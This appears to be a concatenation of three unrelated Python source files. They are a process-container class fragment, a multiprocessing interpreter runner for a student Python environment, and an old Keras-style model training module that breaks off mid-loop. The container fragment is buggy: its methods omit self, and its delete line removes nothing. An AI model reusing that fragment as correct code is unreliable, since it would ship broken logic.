"""Container list that holds each async process being called
Usage:
----
process = ProcessContainer()
process.add_or_delete(MultiProcess, delete = True or False)
"""
def __init__(self, processList = {}) -> None:
self._processList = processList
def add_or_delete_processList(Process: MultiProcess, delete: bool = False):
"""Adds or deletes a multiprocess object within the process
list by using the id as an index
Usage:
----
add_or_delete_processList(Multiprocess object, delete = True or False)
"""
id = Process.get_id
if delete is True:
if id in self._processList.keys():
del[id]
else:
self._processList[id] = Process
def id_in_processList(Process: MultiProcess, Id: int) -> bool:
"""Checks for a valid id within the process list
Returns:
----
{Bool} -- Returns true if id exists, false otherwise
"""
if Id in self._processList.keys():
return True
return False
@property
def ProcessList(self):
"""Gets the process list dictionary for the Process
Container
"""
return self._processList
|
PyInterpreter.py
|
from StudentRunner import StudentRunner
from FullRunner import FullRunner
from translate import tr
import multiprocessing as mp
import tkinter as tk
import tokenize
import sys
RUN_POLL_DELAY=250
class InterpreterProxy:
"""
This is a multiprocessing proxy for the underlying python interpreter.
"""
def __init__(self, root, mode, filename):
self.comm, there = mp.Pipe()
self.process = mp.Process(target=run_process, args=(there, mode, filename))
self.root = root
def run_evaluation(self, expr, callback):
if not self.process.is_alive():
self.process.start()
def timer_callback():
if self.comm.poll():
ok, report = self.comm.recv()
callback(ok, report)
else:
self.root.after(RUN_POLL_DELAY, timer_callback)
self.comm.send('eval')
self.comm.send(expr)
timer_callback()
def execute(self, callback):
if not self.process.is_alive():
self.process.start()
def timer_callback():
if self.comm.poll():
ok, report = self.comm.recv()
# print("[proxy] RECV: exec ok ? {} report={}".format(ok, report))
callback(ok, report)
else:
self.root.after(RUN_POLL_DELAY, timer_callback)
self.comm.send('exec')
timer_callback()
def kill(self):
if self.process.is_alive():
self.process.terminate()
self.process.join()
return True
else:
return False
def run_process(comm, mode, filename):
root = tk.Tk()
interp = PyInterpreter(root, mode, filename)
def run_loop():
command = comm.recv()
if command == 'eval':
expr = comm.recv()
ok, report = interp.run_evaluation(expr)
comm.send((ok, report))
elif command == 'exec':
ok, report = interp.execute()
# print("[interp] exec ok ? {} report={}".format(ok, report))
comm.send((ok, report))
root.after(10, run_loop)
root.title(tr("Interpretation."))
root.after(10, run_loop)
root.withdraw()
root.mainloop()
class PyInterpreter:
"""
This class aims at running the code and checking process, and builds
a report that will be sent to the Console
"""
def __init__(self, root, mode, filename, source=None):
self.root = root
self.filename = filename
self.source = source
self.mode = mode
# This dictionnary can keep the local declarations form the execution of code
# Will be used for evaluation
self.locals = dict()
def run_evaluation(self, expr):
""" Run the evaluation of expr """
output_file = open('interpreter_output', 'w+')
original_stdout = sys.stdout
sys.stdout = output_file
runner = None
if self.mode == "student":
runner = StudentRunner(self.root, self.filename, expr)
else:
runner = FullRunner(self.filename, expr)
ok = runner.evaluate(expr, self.locals)
report = runner.get_report()
begin_report = "=== " + tr("Evaluating: ") + "'" + expr + "' ===\n"
report.set_header(begin_report)
end_report = "\n" + ('=' * len(begin_report)) + "\n\n"
report.set_footer(end_report)
sys.stdout = original_stdout
output_file.close()
return (ok, report)
def execute(self):
""" Execute the runner corresponding to the chosen Python mode """
with tokenize.open(self.filename) as fp:
source = fp.read()
output_file = open('interpreter_output', 'w+')
original_stdout = sys.stdout
sys.stdout = output_file
runner = None
if self.mode == "student":
runner = StudentRunner(self.root, self.filename, source)
else:
runner = FullRunner(self.filename, source)
ok = runner.execute(self.locals)
report = runner.get_report()
import os
begin_report = "=== " + tr("Interpretation of: ") + "'" + os.path.basename(self.filename) + "' ===\n"
len_begin_report = len(begin_report)
# enable?
# if self.mode == 'student':
# begin_report += "# Automatic importation of graphic library\n"
# begin_report += "from studentlib.gfx.image import (draw_line, draw_triangle, fill_triangle\n"
# begin_report += " , draw_ellipse, fill_ellipse\n"
# begin_report += " , overlay, underlay)\n"
# begin_report += "from studentlib.gfx.img_canvas import show_image\n\n"
report.set_header(begin_report)
end_report = "\n" + ('=' * len_begin_report) + "\n\n"
report.set_footer(end_report)
sys.stdout = original_stdout
output_file.close()
return (ok, report)
|
training.py
|
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
from collections import namedtuple
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_axis=True,
exception_prefix=''):
"""Normalize inputs and targets provided by users.
Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
# Arguments
data: User-provided input data (polymorphic).
names: List of expected array names.
shapes: Optional list of expected array shapes.
check_batch_axis: Boolean; whether to check that
the batch axis of the arrays matches the expected
value found in `shapes`.
exception_prefix: String prefix used for exception formatting.
"""
if isinstance(data, dict):
arrays = []
for name in names:
if name not in data:
raise ValueError('No data provided for "' +
name + '". Need data for each key in: ' +
str(names))
arrays.append(data[name])
elif isinstance(data, list):
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise ValueError('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise ValueError(
'Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise TypeError('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise ValueError('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise ValueError('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_axis:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise ValueError(
'Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if isinstance(x_weight, list) and len(x_weight) == 1:
return x_weight
if isinstance(x_weight, dict) and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if isinstance(x_weight, list):
if len(x_weight) != len(output_names):
raise ValueError('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if isinstance(x_weight, dict):
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise TypeError('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(inputs, targets, weights):
x_lengths = [x.shape[0] for x in inputs]
y_lengths = [y.shape[0] for y in targets]
w_lengths = [w.shape[0] for w in weights]
set_x = set(x_lengths)
if len(set_x) != 1:
raise ValueError('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise ValueError('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise ValueError('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise ValueError('Input arrays should have '
'the same number of samples as target arrays. '
'Found ' + str(list(set_x)[0]) + ' input samples '
'and ' + str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise ValueError('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise ValueError(
'You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise ValueError(
'A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if isinstance(metrics, list):
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif isinstance(metrics, dict):
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if not isinstance(output_metrics, list):
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise TypeError('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def batch_shuffle(index_array, batch_size):
"""This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
"""
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
"""Returns a list of batch indices (tuples of indices).
"""
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
def slice_X(X, start=None, stop=None):
"""This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X in a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
"""
if isinstance(X, list):
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
"""Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
"""
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
"""Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
"""
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise ValueError('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise ValueError('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify '
'sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise ValueError('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
class GeneratorEnqueuer(object):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
"""
def __init__(self, generator, pickle_safe=False):
self._generator = generator
self._pickle_safe = pickle_safe
self._threads = []
self._stop_event = None
self.queue = None
def start(self, nb_worker=1, max_q_size=10, wait_time=0.05):
"""Kick off threads which add data from the generator into the queue.
# Arguments
nb_worker: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._pickle_safe or self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._pickle_safe:
self.queue = multiprocessing.Queue(maxsize=max_q_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue(maxsize=max_q_size)
self._stop_event = threading.Event()
for i in range(nb_worker):
if self._pickle_safe:
# Reset random seed else all children processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._pickle_safe:
thread.terminate()
else:
thread.join(timeout)
if self._pickle_safe:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
class Model(Container):
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, execute_kwargs=None, **kwargs):
"""Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
execute_kwargs: when using the Tensorflow backend, these arguments
are passed into calls to sess.run(func, feed_dict, **execute_args).
Ignored for Theano backend.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
"""
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif isinstance(loss_weights, dict):
for name in loss_weights:
if name not in self.output_names:
raise ValueError('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif isinstance(loss_weights, list):
if len(loss_weights) != len(self.outputs):
raise ValueError('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise TypeError('Could not interpret loss_weights argument: ' +
str(loss_weights) +
' - expected a list of dicts.')
# prepare loss functions
if isinstance(loss, dict):
for name in loss:
if name not in self.output_names:
raise ValueError('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise ValueError('Output "' + name +
'" missing from loss dictionary.')
loss_functions.append(objectives.get(loss[name]))
elif isinstance(loss, list):
if len(loss) != len(self.outputs):
raise ValueError('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if not isinstance(masks, list):
masks = [masks]
# prepare sample weights
if isinstance(sample_weight_mode, dict):
for name in sample_weight_mode:
if name not in self.output_names:
raise ValueError('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise ValueError('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif isinstance(sample_weight_mode, list):
if len(sample_weight_mode) != len(self.outputs):
raise ValueError('When passing a list as sample_weight_mode, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed '
'sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2,
name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal'
for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1,
name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i])))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties
# and other layer-specific losses
for loss_tensor in self.losses:
total_loss += loss_tensor
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy
# (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.total_loss = total_loss
self.sample_weights = sample_weights
# these arguments will be passed into calls to sess.run()
# for the TensorFlow backend when executing the functions
# for train, test and predict
self._function_execute_args = execute_kwargs or {}
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
# collected trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.multipliers, self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise RuntimeError('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=None, batch_size=32,
nb_epoch=100, verbose=1, callbacks=None,
val_f=None, val_ins=None, shuffle=True,
callback_metrics=None, initial_epoch=0):
"""Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
"""
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
out_labels = out_labels or []
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics or [],
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
self.validation_gen = None
for epoch in range(initial_epoch, nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if isinstance(ins[-1], float):
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise TypeError('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch, **self._function_execute_args)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
callbacks.on_val_begin(epoch)
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_val_end(epoch, epoch_logs)
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
execute_kwargs = getattr(self, '_function_execute_args', {})
batch_outs = f(ins_batch, **execute_kwargs)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch, **self._function_execute_args)
if isinstance(batch_outs, list):
if batch_index == 0:
for batch_out in enumerate(batch_outs):
